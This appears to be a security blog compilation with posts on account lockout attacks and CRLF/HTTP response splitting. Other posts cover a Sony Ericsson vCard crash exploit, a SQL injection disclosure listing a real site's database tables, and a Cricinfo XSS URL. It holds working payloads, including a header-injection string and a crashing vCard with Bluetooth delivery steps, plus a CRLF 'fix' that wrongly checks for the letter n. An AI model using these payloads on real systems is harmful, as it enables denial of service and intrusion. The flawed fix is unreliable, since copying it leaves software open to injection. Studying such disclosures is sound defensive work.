Account lockout: Security or Vulnerability
ShareIntroduction:
First of all, “Account Lockout” is a security mechanism. It is also a subroutine. This mechanism uses on web application to Electronic gate-pass.
Account lockout is a good way to reduce risk. If a person makes an attempt with a bad password, after a certain number of bad attempts the account will get locked out. Many systems can unlock the account out after a certain amount of time.
Attack:
The account lockout attack is an attack on the client, not the server. It causes the victim’s account to be locked and unable to access it for a period of time causing disruption and if used at the right time can prove very effective. In an account lockout attack, the attacker attempts to lockout all user accounts, typically by failing login more times than the threshold defined by the authentication system. For example, if users are locked out of their accounts after three failed login attempts, an attacker can lock out their account for them simply by failing login three times. This attack can result in a large scale denial of service attack if all user accounts are locked out, especially if the amount of work required to reset the accounts is significant.
Who is the Target?
Sites that operate an account lockout feature depending on incorrect logins in a certain period of time are vulnerable. Note this only works when the system locks the username not the attempting IP address. As otherwise all you are doing is blocking your self out. Sites employ this lockout feature to prevent bruteforce attacks on passwords, an even more severe attack.
Methods of Attack:
- API Abuse
- Flooding
- Brute Force
Ways of Attack:
- First one, Hacker will submit wrong password to system according to targeted username until that account get locked.
- Second one, by editing the cookie, hacker will attempt one login, then find the cookie “logins_incorrect=1″ or similar, and change the value to 999, or any number above the limit. This data will then be sent back to the server and stored in the database so the user will be locked out everywhere.
- Third one, hacker could write a script to simultaneously lockout every username in the database, of course here he will need a username list but most forums and CMS’s have the memberlist ready to copy. This is most disruptive when performed at the company’s busiest times such as New-Year.
Procedure of a successful attack:
# First Phase:
- Analyze system documentation to find list of events that could potentially cause account lockout
- Obtain user account in system and attempt to lock it out by sending malformed or incorrect data repeatedly
- Determine another user’s login ID, and attempt to brute force the password (or other credentials) for it a predetermined number of times or until the system provides an indication that the account is locked out.
#Second Phase:
- Obtain list of authorized users using another attack pattern, such as SQL Injection.
- Attempt to create accounts if possible; system should indicate if a user ID is already taken.
- Attempt to brute force user IDs if system reveals whether a given user ID is valid or not upon failed login attempts.
#Third Phase:
- For each user ID to be locked out, perform the lockout procedure discovered in the first step.
Solutions:
- Do not provide any indication to users that their accounts are locked out. Provide a simple error message such as: “Login failed. Try again or contact your administrator” regardless of why a login attempt fails.
- Avoid providing any indication regarding the validity of user IDs upon failed login attempts. Provide a simple error message such as: “Login failed. Try again or contact your administrator” regardless of why a login attempt fails.
- Build authentication mechanism, which will block account after N tries for a given IP address, from which log in attempt was conducted.
- To minimize possibility of blocking owner`s account we may take under consideration other characteristics like User-Agent or X_FORWARDED_FOR (if it’s present).
- Moreover after N login attempts, but before blocking the account, you may include additional verification by comparing data entered by the user and data displayed to him/her on the picture (CAPTCHA).
Conclusion:
- Needed Hacking skill or knowledge: Low
- Risk of successful attack: High
- Result of attack: Denial of Service
CRLF or HTTPRS: Carriage Return and Line Feed/ HTTP Response Splitting.
Share##Introduction:
After a long time, I am writing about a new thing, new thing cause I’ve learned it last night. Visited couple of sites from last night, and wondering that how I was in dark about “Carriage Return and Line Feedâ€.
##Description:
CRLF injection attacks are not as well known as some other attacks, but when used against vulnerable applications, CRLF injections can be just as effective and devastating .It is fairly simple, yet extremely powerful web attack.  Hackers are actively exploiting this web application vulnerability to perform a large variety of attacks that include XSS cross-site scripting, cross-user defacement, positioning of client's web-cache, hijacking of web pages, defacement and a myriad of other related attacks.  A number of years ago a number of CRLF injection vulnerabilities were also discovered in Google’s Adwords web interface.
Link: Â www.hackingspirits.com/vuln-rnd/adwords-crlf-injection.pdf
CRLF Â is a very significant sequence of characters for programmers. These two special characters represent the End Of Line (EOL) marker for many Internet protocols, including, but not limited to MIME (e-mail), NNTP (newsgroups) and more importantly HTTP. Â When programmers write code for web applications they split headers based on where the CRLF is found. If a malicious user is able to inject his own CRLF sequence into an HTTP stream, he is able to maliciously control the way a web application functions.
The essence of HTTP Response splitting is the attacker's ability to send a single HTTP request that forces the web server to form an output stream, which is then interpreted by the target as two HTTP responses instead of one response, in the normal case. The first response may be partially controlled by the attacker, but this is less important. What is material is that the attacker completely controls the form of the second response from the HTTP status line to the last byte of the HTTP response body. Once this is possible, the attacker realizes the attack by sending two requests through the target. The first one invokes two responses from the web server, and the second request would typically be to some "innocent" resource on the web server. However, the second request would be matched, by the target, to the second HTTP response, which is fully controlled by the attacker. The attacker, therefore, tricks the target into believing that a particular resource on the web server (designated by the second request) is the server's HTTP response (server content), while it is in fact some data, which is forged by the attacker through the web server - this is the second response.
HTTP Response Splitting attacks take place where the server script embeds user data in HTTP response headers. This typically happens when the script embeds user data in the redirection URL of a redirection response (HTTP status code 3xx), or when the script embeds user data in a cookie value or name when the response sets a cookie.
In the first case, the redirection URL is part of the Location HTTP response header, and in the second cookie setting case, the cookie name/value is part of the Set-Cookie HTTP response header.
The essence of the attack is injecting CRs and LFs in such manner that a second HTTP message is formed where a single one was planned for by the application. CRLF injection is a method used for several other attacks which change the data of the single HTTP response send by the application, but in this case, the role of the CRLFs is slightly different - it is meant to terminate the first (planned) HTTP response message, and form another (totally crafted by the attacked, and totally unplanned by the application) HTTP response message (hence the name of the attack). This injection is possible if the application (that runs on top of the web server) embeds un-validated user data in a redirection, cookie setting, or any other manner that eventually causes user data to become part of the HTTP response headers.
With HTTP Response Splitting, it is possible to mount various kinds of attacks:
#Cross-User Defacement
An attacker can make a single request to a vulnerable server that will cause the sever to create two responses, the second of which may be misinterpreted as a response to a different request, possibly one made by another user sharing the same TCP connection with the sever. This can be accomplished by convincing the user to submit the malicious request themselves, or remotely in situations where the attacker and the user share a common TCP connection to the server, such as a shared proxy server.
In the best case, an attacker can leverage this ability to convince users that the application has been hacked, causing users to lose confidence in the security of the application.
In the worst case, an attacker may provide specially crafted content designed to mimic the behavior of the application but redirect private information, such as account numbers and passwords, back to the attacker.
#Cache Poisoning
The impact of a maliciously constructed response can be magnified if it is cached either by a web cache used by multiple users or even the browser cache of a single user. If a response is cached in a shared web cache, such as those commonly found in proxy servers, then all users of that cache will continue receive the malicious content until the cache entry is purged. Similarly, if the response is cached in the browser of an individual user, then that user will continue to receive the malicious content until the cache entry is purged, although the user of the local browser instance will be affected.
#Cross-Site Scripting
Once attackers have control of the responses sent by an application, they have a choice of a variety of malicious content to provide users. Cross-site scripting is common form of attack where malicious JavaScript or other code included in a response is executed in the user's browser.
The variety of attacks based on XSS is almost limitless, but they commonly include transmitting private data like cookies or other session information to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user's machine under the guise of the vulnerable site.
The most common and dangerous attack vector against users of a vulnerable application uses JavaScript to transmit session and authentication information back to the attacker who can then take complete control of the victim's account.
#Page Hijacking
In addition to using a vulnerable application to send malicious content to a user, the same root vulnerability can also be leveraged to redirect sensitive content generated by the server and intended for the user to the attacker instead. By submitting a request that results in two responses, the intended response from the server and the response generated by the attacker, an attacker can cause an intermediate node, such as a shared proxy server, to misdirect a response generated by the server for the user to the attacker.
Because the request made by the attacker generates two responses, the first is interpreted as a response to the attacker's request, while the second remains in limbo. When the user makes a legitimate request through the same TCP connection, the attacker's request is already waiting and is interpreted as a response to the victim's request. The attacker then sends a second request to the server, to which the proxy server responds with the server generated request intended for the victim, thereby compromising any sensitive information in the headers or body of the response intended for the victim.
##Proof-Of-Concept:
Header Injection:
Vulnerable document is “rdt.phpâ€
Injected Header Data:
</p> <p>%0d%0aContent-Type: text/html%0d%0aHTTP/1.1 200 OK%0d%0aContent-Type: text/html%0d%0a%0d%0a%3Chtml%3E%3Cfont color=red%3Ehey%3C/font%3E%3C/html%3E</p> <p>
If the user follows the link, the HTTP request will look like:
</p> <p>GET /rdt.php?page=%0d%0aContent-Type: text/html%0d%0aHTTP/1.1 200 OK%0d%0aContent-Type: text/html%0d%0a%0d%0a%3Chtml%3E%3Cfont color=red%3Ehey%3C/font%3E%3C/html%3E HTTP/1.1\r\n</p> <p>Host: abc.org\r\n</p> <p>User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2\r\n</p> <p>Accept: text/xml,application/xml,application/xhtml xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n</p> <p>Accept-Language: en-us,en;q=0.5\r\n</p> <p>Accept-Encoding: gzip,deflate\r\n</p> <p>Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n</p> <p>Keep-Alive: 300\r\n</p> <p>Connection: keep-alive\r\n</p> <p>\r\n</p> <p>
##Fix:
The CRLF vulnerability is extremely easy to patch. The following code example assumes the input is set to “$_POST['input']â€
</p>
<p>if (eregi('n', $_POST['input'])) //This checks for the new line character in the POST variable</p>
<p>{ //start if..</p>
<p>die("CRLF Attack Detected"); //exit program if CRLF is found in the variable</p>
<p>} //end if..</p>
<p>
##Conclusion:
“Carriage Return and Line Feed†will be famous Attack Method for next generation. Because it not well-known to people. Everybody keeps eyes on SQLi or on XSS. But in upcoming times, it will hard to find a SQLi/XSS vulnerable site or Web-app.
## References:
**Web Sites
**Books
**Blogs
DoS: Sony Ericsson Phone memory Contact.
SharePen-tested Subject: Sony Ericsson Phone Contact.
Discovery Date: 19/03/2010.
Exploit Date: 10/04/2010.
Test Object: Sony Ericsson W580i.
Used Tools: BlueTooth, MyPhoneExplorer and Textpad.
Vulnerability: Denial of Service.
Result : Automatic Force Reboot.
Greetings : FaceBook!! Yaa FaceBook!!
Note: None.
0×01: Introduction:
My younger brother suddenly informed me that, his phone got a problem. It takes Reboot when he wants to call a contact. He also said: “I was working with Digital V-Cardsâ€.
0×02: Description:
**Normal V-Card that saves at SE phone contact.
BEGIN:VCARD VERSION:2.1 N;CHARSET=UTF-8:;Unknown FN;CHARSET=UTF-8:Unknown TEL;CELL:+8801111112222 X-IRMC-LUID:00020000009A END:VCARD
Take a close look at V-Card, there is a character set encoding system (UTF-8) at N (Name) and FN (Family Name).
Why that character encoding used there? Cause SE supports many types of special symbols to write contact name on phone memory. Also it is a multilingual handset.
UTF-8 (8-bit UCS/Unicode Transformation Format) is a variable-length character encoding for Unicode. It is able to represent any character in the Unicode standard, yet is backwards compatible with ASCII. For these reasons, it is steadily becoming the preferred encoding for e-mail, web pages, and other places where characters are stored or streamed.
UTF-8 encodes each character (code point) in 1 to 4 octets (8-bit bytes), with the single–octet encoding used only for the 128 US-ASCII characters.
0×03 Ideas:
1. Let use some special symbols in Contact name (V-Card).
2. Why not, we can set encoded data in CELL number (V-Card).
3. Hopefully SE developers never thought that user can set their V-Card Manually. And hopefully their decoding mechanism does not prepare to decode the CELL numbers.
0×04: Ideas execution:
Let see another V-Card that uses special symbols.
BEGIN:VCARD VERSION:2.1 N;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:;Unknown...=C2=A3 FN;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:Unknown...=C2=A3 TEL;CELL: +8801111112222 X-IRMC-LUID:000200000001 END:VCARD
It works perfectly.
0×05: Exploit:
Successfully exploited V-Card.
BEGIN:VCARD VERSION:2.1 N;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:V=01;Unknown FN;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:Unknown V=01 TEL;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:0000000000000000000000000000000= 0000000000000000000000000000000000000000000000000=EB=BA=BA X-IRMC-LUID:00020000001F END:VCARD
0×06: Attack Method:
1. Save this exploited V-Card.
2. Send this V-Card to targeted phone via Bluetooth from your computer or phone.
0×07: Effect:
Phone will take force reboot if victim want to DELETE, EDIT, CALL and VIEW that V-Card.
0×08: References:
1. The WiKipedia
2. SE Manual.
0×09: Credits:
a. Shakil Mirza.
b. Shahee Mirza.
0×10: Conclusion:
I think there is a vulnerability on Sony Ericsson handset’s Bluetooth. Multi-request and too much DATA flow may causes DoS.
Vulnerability on IPL web portal.
SharePentested result: http://www.iplt20.com
Date: 14/03/2010
Notify to admins: YES
Database Version: MySQL >=5
Name Of DataBase: ipl2010live
Total Tables: 83
Credit : Shahee Mirza
Greetings : Gazi Lenin, learned many things from his tweets 
Note: I did not read or dump any data from that database.
——-
Only Table List here:
——————————————————————
fixtures
lm_data
lm_hotels
lm_rooms
lm_venues
players_workload
slideshow
tbl_accreditation
tbl_ads
tbl_article_video_keywords
tbl_background
tbl_bb_comments
tbl_bb_invites
tbl_bb_invites_data
tbl_bb_invites_text
tbl_bb_invites_tickets
tbl_bb_users
tbl_camerafan
tbl_cloud
tbl_coaching_staff
tbl_comments
tbl_contacts
tbl_dugout
tbl_features
tbl_feed_live_match
tbl_feed_match
tbl_feed_match_innings
tbl_feed_match_innings_ballbyball
tbl_feed_match_innings_batting
tbl_feed_match_innings_bowling
tbl_feed_match_teams
tbl_feed_match_teams_players
tbl_feed_match_umpire
tbl_feed_running
tbl_files
tbl_gallery
tbl_gallery_images
tbl_governingbody
tbl_home_gallery
tbl_homepage
tbl_interviews
tbl_iplteams
tbl_lm_friendinvites
tbl_main_panel_news
tbl_main_panel_now
tbl_main_panel_videos
tbl_master_slave
tbl_matches
tbl_news
tbl_pages
tbl_panel_left
tbl_player_profile
tbl_player_profile_new
tbl_player_stats
tbl_poll_results
tbl_polls_answer_options
tbl_polls_question
tbl_rating
tbl_rs_invites
tbl_rs_invites_text
tbl_teams
tbl_tickets
tbl_trivia
tbl_tv
tbl_user_subscription
tbl_venues
tbl_videos
tbl_wallpaper
tbl_weather
tbladminusers
tblsession
tbluserlogs
wp_commentmeta
wp_comments
wp_links
wp_options
wp_postmeta
wp_posts
wp_term_relationships
wp_term_taxonomy
wp_terms
wp_usermeta
wp_users
——————————————————————
******
Notification sent to info-iplt20 [at] iplt20.com
******
Cricinfo.com iframe vulnerability.
Share
00×01: Introduction
Cricinfo.com is the finest and most famous web portal for cricket. Cricinfo offers users the most comprehensive live coverage of international and domestic cricket available as well as an unparalleled stats database, quality editorial comment and analysis and is part of ESPN. We get lot of information from there. Such people like me, who have not any television at home keeps eyes on it.
00×02: Poc
I have tried to inject iframe on it. Proof of concept is below.
00×03: Details
Vulnerable URL is below.
http://www.cricinfo.com/ci/engine/current/series/index.html?season=[iframe/xss]
00×04: Greetings
Red-D3v1L ## Who discovered XSS vulnerability on “Cricinfo Games 1.0″.
00×05: Credit
SHAHEE MIRZA
